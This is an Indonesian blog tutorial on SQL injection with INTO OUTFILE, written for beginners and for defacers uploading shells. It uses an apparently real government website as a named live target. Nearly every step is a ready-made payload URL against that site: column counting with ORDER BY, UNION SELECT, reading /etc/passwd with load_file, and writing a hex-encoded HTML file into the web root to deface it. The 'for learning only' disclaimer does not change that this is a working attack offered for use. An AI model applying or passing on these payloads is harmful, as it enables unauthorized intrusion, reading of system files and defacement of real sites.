Tutorial SQL Injection Into Outfile untuk pemula
 |
| tutorial sql into outfile. |
Tutorial SQL Info Outfile
Note: tutorial ini hanya untuk pembelajaran
Assalamualaikum, halo pengunjung selamat datang di blog saya Randi Noober, pada halaman kali ini saya akan membagikan tutorial SQL Into Outfile. Teknik ini biasanya digunakan oleh Defacer / gray hat untuk mengupload shell mereka di website yang sudah mereka targetkan.
Live target:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oaLangkah pertama lakukan pentesting terlebih dahulu apalah website tersebut vuln atau tidak. Beri tanda ' di parameternya, jika terjadi perubahan seperti blank, terdapat notif warning atau semacamnya yang membuat tampilan berubah itu berarti vuln.
Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa' |
| tutorial sql into outfile. |
Selanjutnya periksa jumlah column dengan memasukan query ORDER BY di URL
Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'+ORDER+BY+1--+-Jika tampilan halaman kembali seperti semula ubah angka yang ada di URL menjadi 2, jika tidak ada perubahan ubah angka di URL secara perlahan.
Nah disini saya sudah mengetahui jumlah columnnya yaitu 8, Berikut querynya.
Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'+ORDER+BY+8--+-Jika angka di URL adalah 9, lalu terjadi tampilan halaman berubah menjadi blank atau sejenisnya itu berarti jumlah tabelnya ada 8.
 |
| tutorial sql into outfile. |
Jika sudah hapus query order by tadi beserta angkanya, lalu masukan query UNION SELECT untuk menampilkan angka yang ditampilkan dihalaman.
Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'+UNION+SELECT+1,2,3,4,5,6,7,8--+-Jika tidak togelnya tidak muncul kasih tanda - dibelakang angka / huruf parameter
Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=-78b0oa'+UNION+SELECT+1,2,3,4,5,6,7,8--+-Urutan angka seperti 1,2,3 dan seterusnya itu tergantung jumlah tabel, jadi jika jumlah tabel ada 100 berarti urutan angka yang ada di query UNION SELECT harus 1,2,3 sampai seratus.
 |
| tutorial sql into outfile. |
Jika sudah mengetahui angka togelnya silahkan masukan query user() sesuai angka togel yang muncul di halaman untuk mengecek user dari website tersebut, jika usernya seperti root@namaweb itu berarti vuln.
Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'+UNION+SELECT+1,2,3,4,user(),6,7,8--+- |
| tutorial sql into outfile. |
Langkah selanjutnya adalah mengecek path agar bisa mengupload file diwebsite tersebut dengan memasukan query load_file('/etc'passwd')
Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=-78b0oa'+UNION+SELECT+1,2,3,4,load_file('/etc/passwd'),6,7,8--+- |
| tutorial sql into outfile. |
Jika sudah masukan kode html yang sudah di encode ke kode hexadisimal, lalu masukan query into outfilenya.
Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=-78b0oa'+UNION+SELECT+1,2,3,4,KODEHEX,6,7,8+INTO+OUTFILE+'path/namafile.html'--+-https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=-78b0oa'+UNION+SELECT+1,2,3,4,0x3c626f6479207374796c653d2223313130223e0d0a3c683120616c69676e3d2263656e74657222207374796c653d22636f6c6f723a23306630223e7475746f7269616c2062792052616e6469204e6f6f6265723c2f68313e,6,7,8+INTO+OUTFILE+'E:/WWW/1111.htm'--+-Akses file:
https://cews.bmkg.go.id/namafile.html
Sekian tutorial pada halaman ini, jika ada kesalahan atau kekurangan saya pribadi mohon maaf, Wassalamualaikum.
Posting Komentar untuk "Tutorial SQL Injection Into Outfile untuk pemula"